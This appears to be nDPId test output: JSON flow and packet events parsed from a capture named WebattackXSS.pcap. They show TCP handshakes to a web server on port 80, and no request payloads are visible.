-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347238260,"flow_last_seen":1499347243683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347239517,"flow_last_seen":1499347244683,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55078,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347240786,"flow_last_seen":1499347246684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55092,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347243333,"flow_last_seen":1499347248684,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347244580,"flow_last_seen":1499347249685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347365320,"flow_last_seen":1499347365320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347365320,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1499347365320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347365320,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CZFAAD4GvD+sEAABwKgKMtxeAFCYJmWsAAAAAKACchAXCwAAAgQFtAQCCAoBOmw9AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":2,"flow_last_seen":1499347365320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347365320,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3F6n4QiemCZlraAScSAl0wAAAgQFtAQCCAoD5D2zATpsPQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":1499347365321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347365321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CZJAAD4GvEasEAABwKgKMtxeAFCYJmWtp+EIn4AQAOXE2QAAAQEICgE6bD4D5D2z"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347366586,"flow_last_seen":1499347366586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347366586,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56428,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1499347366586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347366586,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8voxAAD4GB0SsEAABwKgKMtxsAFDi5tP2AAAAAKACchBctQAAAgQFtAQCCAoBOm16AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":2,"flow_last_seen":1499347366586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347366586,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3GzFvqcC4ubT96AScSCt\/gAAAgQFtAQCCAoD5D7wATptegEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":3,"flow_last_seen":1499347366587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347366587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vo1AAD4GB0usEAABwKgKMtxsAFDi5tP3xb6nA4AQAOVNBgAAAQEICgE6bXoD5D7w"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347369077,"flow_last_seen":1499347369077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347369077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1499347369077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347369077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NkNAAD4Gj42sEAABwKgKMtyGAFA0BFmqAAAAAKACchCDWwAAAgQFtAQCCAoBOm\/pAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":2,"flow_last_seen":1499347369077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347369077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ib842EVNARZq6AScSDg\/gAAAgQFtAQCCAoD5EFeATpv6QEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1499347369078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347369078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NkRAAD4Gj5SsEAABwKgKMtyGAFA0BFmr\/ONhFoAQAOWABgAAAQEICgE6b+kD5EFe"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347370339,"flow_last_seen":1499347370339,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347370339,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":1,"flow_last_seen":1499347370339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347370339,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iG5AAD4GPWKsEAABwKgKMtyUAFBZvPlKAAAAAKACchC8uQAAAgQFtAQCCAoBOnEkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":2,"flow_last_seen":1499347370339,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347370339,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3JQ4r3KfWbz5S6AScSDLywAAAgQFtAQCCAoD5EKaATpxJAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":236,"flow_packet_id":3,"flow_last_seen":1499347370340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347370340,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iG9AAD4GPWmsEAABwKgKMtyUAFBZvPlLOK9yoIAQAOVq0wAAAQEICgE6cSQD5EKa"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347371602,"flow_last_seen":1499347371602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347371602,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3361,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1499347371602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347371602,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jiZAAD4GN6qsEAABwKgKMtyiAFAEW\/xGAAAAAKACchAN1QAAAgQFtAQCCAoBOnJgAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3362,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":2,"flow_last_seen":1499347371602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347371602,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3KLBqaHpBFv8R6AScSBjZgAAAgQFtAQCCAoD5EPWATpyYAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":3,"flow_last_seen":1499347371603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347371603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jidAAD4GN7GsEAABwKgKMtyiAFAEW\/xHwamh6oAQAOUCbgAAAQEICgE6cmAD5EPW"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347374136,"flow_last_seen":1499347374136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374136,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1499347374136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347374136,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DktAAD4Gt4WsEAABwKgKMty8AFAnfHqSAAAAAKACchBp1QAAAgQFtAQCCAoBOnTZAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":1499347374136,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347374136,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3LxHeFJ\/J3x6k6AScSCGiQAAAgQFtAQCCAoD5EZPATp02QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":3,"flow_last_seen":1499347374137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347374137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DkxAAD4Gt4ysEAABwKgKMty8AFAnfHqTR3hSgIAQAOUlkAAAAQEICgE6dNoD5EZP"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347247114,"flow_last_seen":1499347252685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347248373,"flow_last_seen":1499347253687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347249651,"flow_last_seen":1499347254687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347252179,"flow_last_seen":1499347257688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347253445,"flow_last_seen":1499347258688,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347374718,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3391,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347375388,"flow_last_seen":1499347375388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347375388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 